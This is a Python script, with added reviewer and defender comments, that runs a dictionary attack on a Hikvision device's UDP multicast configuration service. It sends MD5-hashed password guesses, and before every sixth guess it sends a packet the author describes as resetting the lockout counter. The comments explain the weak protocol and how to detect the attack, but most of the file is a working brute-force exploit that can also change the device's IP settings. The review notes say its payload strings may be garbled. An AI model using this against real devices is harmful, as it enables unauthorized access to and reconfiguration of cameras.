# Dictionary-guessing script against a Hikvision device's UDP multicast
# configuration service (239.255.255.250:37020).
#
# For each line of WORDLIST it sends one "update" datagram that carries
# base64(MD5(candidate)) and stops when a reply contains "success". Before
# every sixth guess it first sends the RESET datagram, which the author
# labels as resetting the lockout counter.
#
# NOTE(review): this listing was recovered from a single collapsed line, so
# the nesting below is inferred from syntax -- confirm against the original.
# NOTE(review): the two payload literals look as if their markup was lost in
# extraction; they are reproduced unchanged.
#
# Defender notes:
#  - The credential is an unsalted MD5 digest sent in the clear over UDP, so
#    anyone on the segment can observe it or test guesses at wire speed.
#  - If RESET clears the lockout counter as the author's comment says, the
#    device-side lockout does not bound guesses from the local network;
#    rely on network controls (a dedicated camera VLAN, multicast filtering)
#    instead -- TODO confirm against the firmware in use.
#  - Detection: one source sending sustained traffic to
#    239.255.255.250:37020 that names the same device MAC repeatedly.
import socket
import time  # imported but not used in the visible code
import hashlib
import base64
import re

#UDP multicast address which Hikvision devices listen on
UDP_IP = "239.255.255.250"
UDP_PORT = 37020
MSG_SIZE = 4096  # upper bound on bytes read per reply
DEVICE_MAC = "AA-BB-CC-DD-EE-FF" #change me - THIS IS THE TARGET DEVICE

#change me - update these params to match the target device configuration
# Every request below embeds these values; presumably an accepted "update"
# also applies them, so an unexpected IP or gateway change on a camera is a
# useful indicator -- verify.
NEW_IPV4 = "192.0.0.64"
NEW_IPV4_NM = "255.255.255.0"
NEW_GATEWAY = "192.0.0.5"

#change me - path to your dictionary file
WORDLIST="/tmp/wordlist.txt"

#reset lockout counter packet
# Carries no password digest, unlike the per-guess payload built in the loop.
RESET = 'DAB7B40C-38AA-4CF0-AB6A-E52E6E52B3B6updatetrue'+DEVICE_MAC+''+NEW_IPV4+'8000'+NEW_IPV4_NM+''+NEW_GATEWAY+'::::0false80'

sock = socket.socket(socket.AF_INET, # Internet
                     socket.SOCK_DGRAM) # UDP
# Multicast TTL of 2: datagrams can cross at most one router, so the sender
# sits on, or one hop from, the camera segment.
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# recv() raises after 3 seconds without a reply; the loop reports "TIMEOUT".
sock.settimeout(3)

# NOTE(review): opened without a context manager and never closed.
wordfile = open(WORDLIST, 'r', encoding='utf-8')
print("Starting!")

#bruteforce attempts
attempt_count = 0
while True:
    # An empty or whitespace-only line ends the run, as does end of file.
    word = wordfile.readline().strip()
    if not word:
        break
    # Candidate is hashed with plain MD5 (no salt visible), then base64-encoded.
    raw_md5 = hashlib.md5(word.encode('utf-8'))
    md5b64 = base64.b64encode(raw_md5.digest()).decode('ascii')
    brute = '44037D7F-7D48-4DB0-8893-05705C4AE965updatetrue'+DEVICE_MAC+''+md5b64+''+NEW_IPV4+'8000255.255.0.0'+NEW_GATEWAY+'::::0false80'
    # Progress line every 1000 attempts.
    if (attempt_count %1000 == 0 and attempt_count !=0):
        print(str(attempt_count)+"x requests sent - "+word)
    try:
        #send success reset
        # Sent before attempts 0, 6, 12, ...; its reply is read and discarded.
        if (attempt_count % 6 == 0):
            sock.sendto(RESET.encode(), (UDP_IP, UDP_PORT))
            data = sock.recv(MSG_SIZE)
        sock.sendto(brute.encode(), (UDP_IP, UDP_PORT))
        data = sock.recv(MSG_SIZE)
        # Success is decided by a substring match on the first datagram read.
        if (re.search(r"success", data.decode())):
            print("[+] Success: "+word)
            print(data.decode())
            break
    # NOTE(review): bare except -- every error, including decode failures and
    # KeyboardInterrupt, is reported as "TIMEOUT" and the loop continues.
    except:
        print("TIMEOUT")
    attempt_count += 1
print("DONE")
sock.close()